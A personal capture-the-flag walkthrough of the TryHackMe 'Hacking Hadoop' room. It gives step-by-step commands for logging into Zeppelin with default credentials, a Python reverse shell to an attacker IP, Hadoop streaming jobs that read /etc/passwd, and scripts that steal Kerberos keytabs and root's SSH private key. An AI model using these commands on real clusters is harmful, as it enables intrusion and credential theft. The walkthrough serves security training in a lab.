HACKING HADOOP TryHackMe

Rishabh Rai
8 min readMar 4, 2022

--

LINK TO THE ROOM : https://tryhackme.com/room/hackinghadoop

Download VPN file

Start the machine, and regular your regular openvpn file then run the vpn file u just downloaded from here while keeping the regular openvpn file running in background.

and run the command :

sudo bash -c “echo ‘<MACHINE IP> thm_hadoop_network.net’ >> /etc/hosts”

Now, we can check if everything is setup by doing:

Let’s get to the questions now:

TASK 2 : Understanding the datalake

Which node is responsible for actively keeping the directory tree structure of the datalake?

Primary NameNode

What type of node provides applications for users?

Edge Node

What Hadoop service is responsible for scheduling jobs?

YARN

What Hadoop service provides granular access control to resources?

Ranger

What is the term provided to a datalake that makes use of Kerberos for security?

kerberised

Who owns the largest Hadoop cluster in the world?

Facebook

TASK 3 : All aboard the Hindenburg

I scanned the Host 172.23.0.3 by doing:

nmap 172.23.0.3 -p- — min-rate 1000 -sCV

What edge node service is running on this host?

zeppelin

What file is responsible for the authentication configuration for this service?

hint: Since Apache Zeppelin is open source, google Apache Zeppelin Authentication, this will point you in the right direction.

shiro.ini

What is the username and password combination that gives you your initial entry?

tried admin but it was not active as given in the hint. then user1 worked.

user1:password2

let’s sign in using these creds by going to http://172.23.0.3:8080.

Once authenticated, submit the flag that is hiding nicely in one of the notebooks.

flag in the NOTEBOOKS

after signing in we can go to TESTNODE and see the flag right there.
PS: don’t rush for revshell, first take the flag from here 🥸.

THM{*********************}

TASK 4 : Rocking It Like led

What is the password of the user allowed to interface with the interpreters and provided notebook?

on the same notebook in task 3, if u scroll down u can find this.

p@ssw0rd12345

Which active interpreter can be used to execute code?

python

Now we have the username and password let’s horizontally escalate our privilege. And create a new note and input our code for reverse shell.
Now all that is left is to hit run.

CODE:

import socket,os,pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((“<attacker IP>”,<port>));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
pty.spawn(“/bin/sh”)

Noiceeee we have a rev shell on the system. let’s answer some questions then.

What OS user does the application run as?

zp

What is the value of the flag found in the user’s home directory (flag2.txt)?

THM{****************************}

flag2.txt

TASK 5 : Keeping tabs on all these keys

After reading the task i found out that, finding the keytabs is necessary and most important work to do right now so ran a find command to find the keytab files on the host.

find / -name *.keytab 2>/dev/null

Which directory stores the keytabs for the Hadoop services?

/etc/security/keytab

What is the keytab file’s name associated with the compromised user?

zp.service.keytab

What is the first principal stored in this keytab file?

zp/hadoop.docker.com@EXAMPLE.COM

What is the full verbose command to authenticate with this keytab using the full file path?

kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytab/zp.service.keytab

flag3.txt

What is the value of the flag stored in the compromised user’s HDFS home directory (flag3.txt)?

THM{******************}

TASK 6 : A great big ball of Yarn

used touchz to create a file in /tmp

What is the name of the service we will attempt to impersonate for privilege escalation?

yarn

To move ahead i had to take a look at OPTION 5 of the GitHub link given in the task on how to run remote commands.

What is the value of the flag in the impersonated user’s HDFS home directory (flag4.txt)?

flag4.txt

THM{*************}

  • -input <a non empty file on HDFS>: this will be provided as input to MapReduce for the command to be executed, just put at least a character in that file, this file is useless for our objective
  • -output <a nonexistant directory on HDFS>: this directory will be used by MapReduce to write the result, either _SUCCESS or failure
  • -mapper <your single command>: the command to execute, for instance "/bin/cat /etc/passwd". The output result will be written in the -output directory
  • -reducer NONE: there is no need for a reducer to execute a single command, a mapper is enough

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby4 -mapper “/bin/cat /etc/passwd” -reducer NONE

this is the command i used to read /etc/passwd and with a few changes read the flag file which are not permitted to be read.

What is the value of the flag in the impersonated user’s OS home directory (flag5.txt)?

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby16 -mapper “cat /home/yarn/flag5.txt” -reducer NONE

./hdfs dfs -cat /tmp/webby16/part-00000

flag5.txt

THM{*************}

Task 7 : Assistant to the regional Node

What is the value of the flag associated with the NodeManager’s HDFS home directory (flag6.txt)?

Let’s get keytab of nm user to get the next flag.

echo -e ‘#!/bin/bash’ > /tmp/evil.sh
echo -e ‘cp /etc/security/keytabs/nm.service.keytab /tmp/nm.service.keytab’ >> /tmp/evil.sh
echo -e ‘chmod 777 /tmp/nm.service.keytab’ >> /tmp/evil.sh

/usr/local/hadoop-2.7.7/bin/hdfs dfs -touchz /tmp/webhead.txt

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby2 -mapper “/tmp/evil.sh” -file /tmp/evil.sh -reducer NONE

klist -k /tmp/nm.service.keytab

kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab

/usr/local/hadoop-2.7.7/bin/hdfs dfs -cat /user/nm/flag6.txt

to get the flag i want you to follow these commands step by step.

and suppose u r getting a error like “this directory /tmp/webby2 already exists” then just change the name from webby2 to something like webby3 or webby4 anything other than webby2. Hope you got it!.

flag6.txt

What is the value of the flag associated with the NodeManager’s OS home directory (flag7.txt)?

— — — — — — — — — — — — — — — — — — — —

echo -e ‘#!/bin/bash’ > /tmp/evil2.sh
echo -e ‘sudo cp /root/.ssh/id_rsa /tmp/id_rsa_stolen’ >> /tmp/evil2.sh
echo -e ‘sudo chmod 777 /tmp/id_rsa_stolen’ >> /tmp/evil2.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby8 -mapper “/tmp/evil2.sh” -file /tmp/evil2.sh -reducer NONE

i tried to get ssh to make my misery a little less painful but wasn’t able to get into, after getting the id_rsa key 🥸 i was unable to login.

Then I had to change my approach a little.

— — — — — — — — — — — — — — — — — — — — —

echo -e ‘#!/bin/bash’ > /tmp/flag7.sh
echo -e ‘cat /home/nm/flag7.txt’ >> /tmp/flag7.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby3 -mapper “/tmp/flag7.sh” -file /tmp/flag7.sh -reducer NONE

./hdfs dfs -cat /tmp/webby3/part-00000

follow these commands as they are and you should get your next flag.

flag7.txt

THM{**********}

TASK 8: I:heart:root

What is the value of the flag in the root user’s home directory (flag8.txt)?

echo -e ‘#!/bin/bash’ > /tmp/root.sh
echo -e ‘sudo cp /root/flag8.txt /tmp/root.txt’ >> /tmp/root.sh
echo -e ‘sudo chmod 777 /tmp/root.txt’ >> /tmp/root.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby33 -mapper “/tmp/root.sh” -file /tmp/root.sh -reducer NONE

flag8.txt

THM{**********}

ps: this flag was soo trueeeee!!!!!!!

What is the value of the flag in the root user’s HDFS home directory (flag9.txt)?

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby21 -mapper “/tmp/evil3.sh” -file /tmp/evil3.sh -reducer NONE

echo -e ‘#!/bin/bash’ > /tmp/evil3.sh
echo -e ‘sudo cp /etc/security/keytabs/root.service.keytab /tmp/root.service.keytab’ >> /tmp/evil3.sh
echo -e ‘sudo chmod 777 /tmp/root.service.keytab’ >> /tmp/evil3.sh

klist -k /tmp/root.service.keytab
kinit root@EXAMPLE.COM -k -V -t /tmp/root.service.keytab

/usr/local/hadoop-2.7.7/bin/hdfs -dfs -cat flag9.txt

flag9.txt

THM{***********}

TASK 10 : Surfing the datalake

What is the value of the flag in the root user’s directory on the secondary cluster node (flag10.txt)?

The id_rsa key I found earlier turned out to be the id_rsa key for 172.23.0.4 hence used it and logged in easily. And the flag was waiting right away for me.

{thanks Nguyen Van Tien from DISC for helping with this part coz i coudln’t have guessed on my own that this is the ssh for 172.23.0.4 😅}

flag10.txt

AND FINALLY THE ROOM IS COMPLETED!! 🎉🥳

Special Thanks to am03bam4n for making this soul sucking room and guiding me through the room. and not letting me go insane haha.

HAPPY HACKING 🥳🥳🥳🎉🎉

linktree: https://linktr.ee/RishabhRai

--

--

Rishabh Rai

4th year student exploring the world of cyber security with a knack for writing and always learning.